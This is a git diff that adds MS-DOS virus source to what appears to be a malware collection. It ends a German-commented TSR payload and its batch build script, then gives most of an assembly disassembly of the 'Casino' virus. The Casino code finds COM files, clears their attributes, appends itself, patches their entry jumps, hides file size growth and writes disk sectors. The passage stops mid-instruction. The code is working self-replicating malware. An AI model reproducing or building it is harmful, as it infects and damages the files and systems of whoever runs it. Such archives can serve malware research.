+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_048 LABEL NEAR ; +XR_009 EQU XI_048 + PSPsize ;----------; + TEST CS:[ISR_Flags],MASK R_in_1c OR MASK ExtCom ; + JZ XI_049 ;----------; + JMP XI_067 ; +XI_049: OR CS:[ISR_Flags],MASK R_in_1c ; + DEC CS:[XR_002] ; + JZ XI_050 ; + JMP XI_066 ; +XI_050: SAVE DS,ES ; + MOV_S DS,CS ; + MOV_S ES,CS ; + SAVE AX,BX,CX,DX,SI,DI,BP ; + MOV AL,EOI_8259A ; + OUT PORT_B_8259A,AL ; + MOV AX,[XR_003] ; + CMP AX,0438 ; + JNB XI_051 ; + MOV AX,0438 ; +XI_051: CALL Random ; + INC AX ; + MOV [XR_002],AX ; + MOV [XR_003],AX ; + PUSH DS ; + MOV AX,BIOSDATASEG ; + MOV DS,AX ; + MOV AX,[B_VidPage] ; + POP DS ; + MOV [Page_offset],AX ; + MOV [Last_Line],18 ; + MOV DL,-1 ; + MOV AX,1130 ; + MOV BH,0 ; + SAVE ES,BP ; + INT 10 ; + REST BP,ES ; + CMP DL,-1 ; + JZ XI_052 ; + MOV [Last_Line],DL ; +XI_052: CALL GetSysSpeed ; + MOV AH,0F ; + INT 10 ; + MOV [Num_of_Col],AH ; + MOV [Prevent_Snow?],0 ; + MOV [Seg_of_VRAM],MonoBase ; + CMP AL,07 ; + JZ XI_054 ; + JB XI_053 ; + JMP XI_064 ; +XI_053: MOV [Seg_of_VRAM],ColorBase ; + CMP AL,03 ; + JA XI_054 ; + CMP AL,02 ; + JB XI_054 ; + MOV [Prevent_Snow?],01 ; + MOV AL,[Last_Line] ; + INC AL ; + MUL [Num_of_Col] ; + MOV [Num_of_char],AX ; + MOV AX,[XR_004] ; + CMP AX,[Num_of_char] ; + JBE XI_054 ; + MOV AX,[Num_of_char] ; +XI_054: CALL Random ; + INC AX ; + MOV SI,AX ; +XI_055: XOR DI,DI ; +XI_056: INC DI ; + MOV AX,[Num_of_char] ; + SHL AX,1 ; + CMP DI,AX ; + JBE XI_057 ; + JMP XI_064 ; +XI_057: OR [ISR_Flags],MASK Recf_1 ; + MOV AL,[Num_of_Col] ; + MOV AH,0 ; + CALL Random ; + MOV DL,AL ; + MOV AL,[Last_Line] ; + MOV AH,0 ; + CALL Random ; + MOV DH,AL ; + CALL Load_from_VRAM ; + CALL Is_it_blank_? ; + JB XI_056 ; + CALL Spec_Graphik? ; + JB XI_056 ; + MOV [Last_Pair],AX ; + MOV CL,[Last_Line] ; + MOV CH,0 ; +XI_058: INC DH ; + CMP DH,[Last_Line] ; + JA XI_062 ; + CALL Load_from_VRAM ; + CMP AH,[Last_Attr] ; + JNZ XI_062 ; + CALL Is_it_blank_? ; + JB XI_060 ; +XI_059: CALL Spec_Graphik? 
; + JB XI_062 ; + INC DH ; + CMP DH,[Last_Line] ; + JA XI_062 ; + CALL Load_from_VRAM ; + CMP AH,[Last_Attr] ; + JNZ XI_062 ; + CALL Is_it_blank_? ; + JNB XI_059 ; + CALL Toggle_Speaker ; + DEC DH ; + CALL Load_from_VRAM ; + MOV [Last_Char],AL ; + INC DH ; +XI_060: AND [ISR_Flags],NOT MASK Recf_1 ; + DEC DH ; + MOV AL,' ' ; + CALL Write_to_VRAM ; + INC DH ; + MOV AL,[Last_Char] ; + CALL Write_to_VRAM ; + JCXZ XI_061 ; + CALL Delay ; + DEC CX ; +XI_061: JMP XI_058 ; +XI_062: TEST [ISR_Flags],MASK Recf_1 ; + JZ XI_063 ; + JMP XI_056 ; +XI_063: CALL Toggle_Speaker ; + DEC SI ; + JZ XI_064 ; + JMP XI_055 ; +XI_064: IN AL,PORT_B_8255 ; + AND AL,0FC ; + OUT PORT_B_8255,AL ; + MOV AX,3 ; + CALL Random ; + INC AX ; + MUL [XR_004] ; + JNB XI_065 ; + MOV AX,-1 ; +XI_065: MOV [XR_004],AX ; + REST BP,DI,SI,DX,CX,BX,AX,ES,DS ; +XI_066: AND CS:[ISR_Flags],NOT MASK R_in_1c ; +XI_067: JMP DWORD PTR CS:[Org_Int_1C] ; + ; +IF SWITCHABLE ; + ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Implementierung eines neuen in CMD_2F definierten internen Befehls. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +XI_068 Label Near ; +Int_2F_ISR EQU XI_068 + PSPsize ; + CMP AH,0AEH ; + JNZ Int_2F_end ; + CMP DX,-1 ; + JNZ Int_2F_end ; + CMP AL,0 ; + JNZ Int_2F_2nd ; + CALL Decode_2F ; + JNZ Int_2F_end ; + DEC AL ; + IRET ; +Int_2F_2nd: CMP AL,1 ; + JNZ Int_2F_end ; + CALL Decode_2F ; + JNZ Int_2F_end ; + SAVE DS,DX,AX ; + MOV_S DS,CS ; + XOR [ISR_Flags],MASK ExtCom ; + MOV DX,OFFSET MSG_ON ; + TEST [ISR_Flags],MASK ExtCom ; + JZ XI_069 ; + MOV DX,OFFSET MSG_OFF ; +XI_069: MOV AH,9 ; + MSDOS ; + REST AX,DX,DS ; + AND BYTE PTR [SI],0 ; + IRET ; +Int_2F_end: JMP DWORD PTR CS:[Org_Int_2F] ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + 歜erpr乫en, ob der in CMD_2F definierte Befehl angesprochen wurde. 
+滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +Decode_2F PROC NEAR ; + SAVE SI,DI,ES,CX ; + MOV CX,05 ; + MOV_S ES,CS ; + MOV DI,OFFSET Cmd_2F ; + CLD ; + REPE CMPSW ; + REST CX,ES,DI,SI ; + RET ; +Decode_2F ENDP ; + ; +ENDIF ; + comment # +谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪目 + Okay, das war's. Zum Schlu noch einige Definitionen. +滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪馁 + # ; +EOFC EQU THIS WORD ; +XR_010 EQU OFFSET EOFC - 1 + FIRSTBASE ; +TEXT ENDS ; +IF2 ;----------------; +%Out 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 +%Out 韧屯屯屯 (C) 1990 164A12565AA18213165556D3125C4B962712 屯屯屯屯图 +ENDIF ; +comment # +赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + + So k攏nte ein Batch - Makefile aussehen : + + @cls + @if %1.==. goto nopar + @if not exist %1.asm goto noasm + @ctty nul + @del %1.obj + @del %1.lst + @del %1.crf + @del %1.ref + @del %1.map + @del %1.exe + @del %1.bin + @del _HLV_.COM + @ctty con + @masm /b63 %1,,%1,%1 %2 %3 %4; + @if not exist %1.obj goto masm_err + @link %1,,%1; + @if not exist %1.exe goto link_err + @exe2bin %1; + @if not exist %1.bin goto exe2_err + @cref %1; + @if not exist %1.ref goto cref_err + @echo >> %1.lst + @copy %1.lst+%1.map+%1.ref %1.t > nul + @del %1.lst > nul + @ren %1.t %1.lst > nul + @del %1.obj > nul + @del %1.crf > nul + @del %1.ref > nul + @del %1.map > nul + @del %1.exe > nul + @echo n %1.bin > md.inp + @echo l 11f >> md.inp + @echo a 110 >> md.inp + @echo add cx,20 >> md.inp + @echo. >> md.inp + @echo g =110 113 >> md.inp + @echo f 110 11e 20 >> md.inp + @echo e 110 '%1' >> md.inp + @echo f 100 10f 90 >> md.inp + @echo a 100 >> md.inp + @echo jmp 120 >> md.inp + @echo nop >> md.inp + @echo nop >> md.inp + @echo nop >> md.inp + @echo mov ax,4c00 >> md.inp + @echo int 21 >> md.inp + @echo. >> md.inp + @echo n _HLV_.com >> md.inp + @echo w >> md.inp + @echo q >> md.inp + @debug < md.inp > nul + @cls + @echo. 
+ @echo 赏屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯突 + @echo 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 + @echo 喊鞍鞍鞍MAKEHLV erfolgreich beendet, _HLV_.com wurde erstellt.鞍昂 + @echo 喊鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍鞍昂 + @echo 韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 + @echo. + @goto ende + :nopar + @echo FEHLER ! Mindestens ein Parameter ist erforderlich ! + @echo Syntax : MAKEHLV asmfile [switches] + @goto ende + :noasm + @echo FEHLER ! Die Datei %1.ASM ist nicht zu finden ! + @goto ende + :masm_err + @echo FEHLER ! %1.OBJ konnte nicht erstellt werden ! + @goto ende + :link_err + @echo FEHLER ! %1.EXE konnte nicht erstellt werden ! + @goto ende + :exe2_err + @echo FEHLER ! %1.BIN konnte nicht erstellt werden ! + @goto ende + :cref_err + @echo FEHLER ! %1.REF konnte nicht erstellt werden ! + :ende + +韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯图 +# +END diff --git a/MSDOS/Virus.MSDOS.Unknown.casino.asm b/MSDOS/Virus.MSDOS.Unknown.casino.asm new file mode 100644 index 00000000..b88bc5fc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.casino.asm 
@@ -0,0 +1,1428 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CASINO 圹 +;圹 圹 +;圹 Created: 31-Aug-90 圹 +;圹 Version: 圹 +;圹 Passes: 9 Analysis Options on: H 圹 +;圹 Copyright S & S International, 1990 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_1e equ 60Ch ; (0000:060C=0) +data_2e equ 60Dh ; (0000:060D=0) +data_3e equ 60Eh ; (0000:060E=0) +data_4e equ 60Fh ; (0000:060F=0) +data_5e equ 610h ; (0000:0610=0) +data_6e equ 611h ; (0000:0611=0) +data_7e equ 612h ; (0000:0612=0) +data_8e equ 2 ; (6AE6:0002=0) +data_10e equ 3Bh ; (6AE6:003B=0) +data_11e equ 3Dh ; (6AE6:003D=0) +data_12e equ 3Fh ; (6AE6:003F=0) +data_13e equ 40h ; (6AE6:0040=0) +data_14e equ 41h ; (6AE6:0041=0) +data_15e equ 43h ; (6AE6:0043=6AE6h) +data_16e equ 45h ; (6AE6:0045=0) +data_17e equ 47h ; (6AE6:0047=6AE6h) +data_18e equ 4Dh ; (6AE6:004D=0) +data_19e equ 68h ; (6AE6:0068=0) +data_20e equ 7Eh ; (6AE6:007E=0) +data_21e equ 80h ; (6AE6:0080=0) +data_33e equ 716Eh ; (6AE6:716E=0) + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +casino proc far + +start: + nop +data_23 db 0E9h +data_24 db 48h +data_25 db 7, 'ello - Copyright S & S Intern' + db 'ational, 1990', 0Ah, 0Dh, '$' + db 1Ah + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AA' + db 0E6h + db 'jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + db 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' + +casino endp + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +; +; External Entry Point +; 
+;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +int_24h_entry proc far + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc 
cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + inc cx + mov ah,9 + mov dx,offset data_25 ; (6AE6:0103=7) + int 21h ; DOS Services ah=function 09h + ; 
display char string at ds:dx + int 20h ; Program Terminate + db 0, 0, 0, 0, 0, 0Fh + db 0, 0, 0E9h, 0D3h, 1, 0E9h + db 0, 0, 0, 90h, 0E9h, 78h + db 2Ah, 2Ah, 2Eh, 43h, 4Fh, 4Dh + db 0 + db 'C:\COMMAND.COM' + db 0, 43h, 4Fh, 4Dh, 4Dh, 41h + db 4Eh, 44h, 0FFh + db 2Eh, 43h, 4Fh, 4Dh + db 15 dup (0) + db 3Fh, 0, 0F0h, 3, 2, 0 + db 0B3h, 4Bh, 0FCh, 91h, 56h, 5 + db 79h, 10h, 0, 0, 0, 0 + db 0, 3 + db 8 dup (3Fh) + db 43h, 4Fh, 4Dh, 3Fh, 8, 0 + db 1Eh, 2, 2Eh, 8Bh, 26h, 68h + db 20h, 0A9h, 8Eh, 1Fh, 15h, 0E8h + db 3, 0, 0 + db 'H1000.COM' + db 9 dup (0) + db 1Fh, 15h, 0A9h, 8Eh, 90h, 90h + db 3Dh, 59h, 4Bh, 75h, 4, 0B8h + db 66h, 6, 0CFh, 80h, 0FCh, 11h + db 74h, 8, 80h, 0FCh, 12h, 74h + db 3, 0EBh, 51h, 90h +loc_2: + cmp al,66h ; 'f' + je loc_4 ; Jump if equal + mov al,66h ; 'f' + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + push ax + push bx + push cx + push dx + push es + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov al,es:[bx+10h] + cmp al,43h ; 'C' + jne loc_3 ; Jump if not equal + mov al,es:[bx+11h] + cmp al,4Fh ; 'O' + jne loc_3 ; Jump if not equal + mov al,es:[bx+12h] + cmp al,4Dh ; 'M' + jne loc_3 ; Jump if not equal + mov ax,es:[bx+24h] + cmp ax,91Ah + jb loc_3 ; Jump if below + sub ax,91Ah + mov cx,ax + push cx + mov cx,10h + mov dx,0 + div cx ; ax,dx rem=dx:ax/reg + pop cx + cmp dx,0 + jne loc_3 ; Jump if not equal + mov es:[bx+24h],cx +loc_3: + pop es + pop dx + pop cx + pop bx + pop ax + iret ; Interrupt return +int_24h_entry endp + +loc_4: + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + mov bx,cs + mov ds,bx + mov al,0 + mov ds:data_18e,al ; (6AE6:004D=0) + mov al,ds:data_13e ; (6AE6:0040=0) + cmp al,0FFh + jne loc_5 ; Jump if not equal + jmp loc_15 ; (06B2) +loc_5: + mov al,0FFh + mov ds:data_13e,al ; (6AE6:0040=0) + cmp ah,4Bh ; 'K' + je loc_6 ; Jump if equal + cmp ah,36h ; '6' + je loc_7 ; Jump if equal + jmp loc_15 ; (06B2) +loc_6: + 
mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov ds:data_12e,al ; (6AE6:003F=0) + jmp short loc_8 ; (0624) + db 90h +loc_7: + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov ds:data_12e,al ; (6AE6:003F=0) + cmp dl,0 + je loc_8 ; Jump if equal + dec dl + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) +loc_8: + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + cmp al,1 + ja loc_9 ; Jump if above + mov ch,0 + push ds + pop es + mov bx,917h + mov al,1 + call sub_3 ; (07DB) + mov al,1 + call sub_4 ; (07EC) + cmp ah,0 + je loc_9 ; Jump if equal + jmp short loc_14 ; (069C) + db 90h +loc_9: + mov ah,2Fh ; '/' + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov ds:data_14e,bx ; (6AE6:0041=0) + mov ds:data_15e,es ; (6AE6:0043=6AE6h) + mov dx,4Eh + mov ah,1Ah + int 21h ; DOS Services ah=function 1Ah + ; set DTA to ds:dx + mov dx,0Bh + mov cx,3Fh + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_14 ; Jump if carry Set + mov dx,6Ch + call sub_1 ; (06EE) + cmp dl,1 + jne loc_10 ; Jump if not equal + call sub_2 ; (073C) + jmp short loc_14 ; (069C) + db 90h +loc_10: + cmp dl,3 + je loc_11 ; Jump if equal + jmp short loc_14 ; (069C) + db 90h +loc_11: + mov ah,4Fh ; 'O' + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_12 ; Jump if carry=0 + jmp short loc_14 ; (069C) + db 90h +loc_12: + mov dx,6Ch + call sub_1 ; (06EE) + cmp dl,1 + jne loc_13 ; Jump if not equal + call sub_2 ; (073C) + jmp short loc_14 ; (069C) + db 90h +loc_13: + cmp dl,3 + je loc_11 ; Jump if equal +loc_14: + mov dl,ds:data_12e ; (6AE6:003F=0) + mov ah,0Eh + int 21h ; DOS Services ah=function 0Eh + ; set default drive dl (0=a:) + mov dx,ds:data_14e ; (6AE6:0041=0) + mov bx,ds:data_15e ; (6AE6:0043=6AE6h) + mov ds,bx + mov ah,1Ah + int 21h ; DOS Services 
ah=function 1Ah + ; set DTA to ds:dx +loc_15: + mov ah,0 + mov ds:data_13e,ah ; (6AE6:0040=0) + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax +;* jmp far ptr loc_1 ;*(0273:1460) + db 0EAh, 60h, 14h, 73h, 2 + db 8Ch, 0CAh, 83h, 0C2h, 10h, 8Eh + db 0DAh, 0BAh, 20h, 0, 0B4h, 41h + db 0CDh, 21h, 0B8h, 21h, 35h, 0CDh + db 21h, 8Ch, 6, 0D4h, 1, 89h + db 1Eh, 0D2h, 1, 0BAh, 82h, 0 + db 0B8h, 21h, 25h, 0CDh, 21h, 0BAh + db 1Bh, 0Ch, 0CDh + db 27h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near + mov ax,ds:data_19e ; (6AE6:0068=0) + cmp ax,0F5B9h + ja loc_20 ; Jump if above + mov ax,4300h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx + test cl,4 + jnz loc_20 ; Jump if not zero + test cl,1 + jz loc_16 ; Jump if zero + and cl,0FEh + mov ax,4301h + int 21h ; DOS Services ah=function 43h + ; get/set file attrb, nam@ds:dx +loc_16: + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov dx,3 + mov cx,1 + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + jnc loc_17 ; Jump if carry=0 + jmp short loc_19 ; (0732) + db 90h +loc_17: + cmp ax,0 + jne loc_18 ; Jump if not equal + jmp short loc_19 ; (0732) + db 90h +loc_18: + mov al,byte ptr ds:data_8e+1 ; (6AE6:0003=0) + cmp al,90h + jne loc_21 ; Jump if not equal +loc_19: + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle +loc_20: + mov dl,3 + retn +loc_21: + mov dl,1 + retn +sub_1 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + mov ax,5700h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ds:data_20e,dx ; (6AE6:007E=0) + mov ds:data_21e,cx ; (6AE6:0080=0) + push bx + call sub_5 ; (07FD) + mov bx,68h + mov ax,[bx] + mov dx,0 + mov bx,10h + div bx ; ax,dx rem=dx:ax/reg + inc ax + mov ds:data_10e,ax ; (6AE6:003B=0) + mul bx ; dx:ax = reg * ax + mov ds:data_11e,ax ; (6AE6:003D=0) + pop bx + mov cx,ds:data_10e ; (6AE6:003B=0) + mov si,35Fh + mov [si],cx + mov cx,0 + mov dx,0 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,605h + mov cx,4 + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, cx=bytes, to ds:dx + mov cx,0 + mov dx,ds:data_11e ; (6AE6:003D=0) + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov dx,0 + mov cx,91Ah + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx + cmp ax,cx + jb loc_22 ; Jump if below + mov al,ds:data_18e ; (6AE6:004D=0) + cmp al,1 + je loc_22 ; Jump if equal + mov cx,0 + mov dx,0 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, cx,dx=offset + mov si,9 + mov ax,ds:data_11e ; (6AE6:003D=0) + add ax,35Ch + sub ax,4 + mov [si],ax + mov dx,7 + mov cx,4 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file cx=bytes, to ds:dx +loc_22: + mov dx,ds:data_20e ; (6AE6:007E=0) + mov cx,ds:data_21e ; (6AE6:0080=0) + mov ax,5701h + int 21h ; DOS Services ah=function 57h + ; get/set file date & time + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + call sub_6 ; (0813) + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near + push ax + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov dl,al + pop ax + mov dh,0 + mov cl,1 + mov ah,2 + int 13h ; Disk dl=drive #: ah=func b2h + ; read sectors to memory es:bx + retn +sub_3 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + push ax + mov ah,19h + int 21h ; DOS Services ah=function 19h + ; get default drive al (0=a:) + mov dl,al + pop ax + mov dh,0 + mov cl,1 + mov ah,3 + int 13h ; Disk dl=drive #: ah=func b3h + ; write sectors from mem es:bx + retn +sub_4 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_5 proc near + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov 
